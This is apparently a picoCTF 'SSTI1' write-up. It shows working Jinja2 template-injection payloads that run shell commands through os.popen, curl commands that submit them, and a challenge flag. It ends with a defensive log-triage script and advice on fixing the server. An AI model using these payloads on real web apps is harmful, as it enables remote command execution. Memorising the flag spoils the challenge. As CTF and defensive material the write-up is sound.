SSTI1

Challenge Overview

I made a cool website where you can announce whatever you want! Try it out!
I heard templating is a cool and modular way to build web apps! Check out my website here!

Solution

If you enter any value, the page simply repeats it back. You can experiment with different inputs, but the following are the ones that allow you to run commands.

Putting this in the field and pressing Ok lists the contents of the current directory: {{ cycler.__init__.__globals__.os.popen('ls -la').read() }}

From here you can see that the flag file is just called flag and you can print it out with this: {{ cycler.__init__.__globals__.os.popen('cat flag').read() }}

After that runs the flag should be printed out on the webpage.

The challenge was tagged browser_webshell_solvable, so here is an alternative solution that uses only the command line. First, you can use the curl command to see the HTML: curl http://rescued-float.picoctf.net:52534/

This is the key part to look at:

<form action="/" method="POST">
    What do you want to announce: <input name="content" id="announce">
    <button type="submit"> Ok </button>
</form>

Based on that, you can use curl -X POST -d "content=Hey" http://rescued-float.picoctf.net:52534/ to submit the form. The response is a redirect, so you can add the -L flag (or just use wget instead) to get to the redirected page. This command gives the flag:

curl -L -X POST -d "content={{ cycler.__init__.__globals__.os.popen('cat flag').read() }}" http://rescued-float.picoctf.net:52534/

If you wanted to take it a step further, you could redirect the output of curl into a file (named file here) and run this command:

grep -E 'picoCTF\{.*\}' file | cut -d ">" -f2 | cut -d "<" -f1 > flag.txt

Then cat flag.txt to get the flag.

Flag: picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_ae48...}
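
From the defender's side, the POST bodies used above are easy to spot in request logs. The following is an added example, not part of the challenge or its server code: a small triage script that percent-decodes the content form field and flags template expressions that reach into dunder attributes. The function names and the sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Template delimiters as used in the payloads above: {{ ... }} or {% ... %}
EXPR = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)
# Dunder access (__init__, __globals__) is how the payloads walk from a
# template global to Python internals.
DUNDER = re.compile(r"__\w+__")


def inspect_body(body, field="content"):
    """Classify one form-encoded POST body.

    Returns (verdict, expressions); verdict is "clean",
    "template-syntax" or "object-traversal".
    """
    # parse_qs percent-decodes, so %7B%7B...%7D%7D is seen as {{...}}
    values = parse_qs(body, keep_blank_values=True).get(field, [])
    exprs = []
    for value in values:
        for m in EXPR.finditer(value):
            exprs.append((m.group(1) or m.group(2) or "").strip())
    if not exprs:
        return "clean", []
    if any(DUNDER.search(e) for e in exprs):
        return "object-traversal", exprs
    return "template-syntax", exprs


# Constructed sample bodies (not captured traffic)
SAMPLES = [
    "content=Hey",
    "content=%7B%7B+greeting+%7D%7D",
    "content={{ cycler.__init__.__globals__.os.popen('cat flag').read() }}",
    "content=%7B%7Bcycler.__init__.__globals__%7D%7D",
]


def scan(bodies):
    """Return (body, verdict, expressions) for each body."""
    return [(b, *inspect_body(b)) for b in bodies]


if __name__ == "__main__":
    for body, verdict, exprs in scan(SAMPLES):
        print(f"{verdict:17} {exprs} <- {body[:40]}")
```

Pattern matching like this is only for alerting and triage. The fix is on the server: never build the template source from user input, and pass the submitted value to the template as data instead.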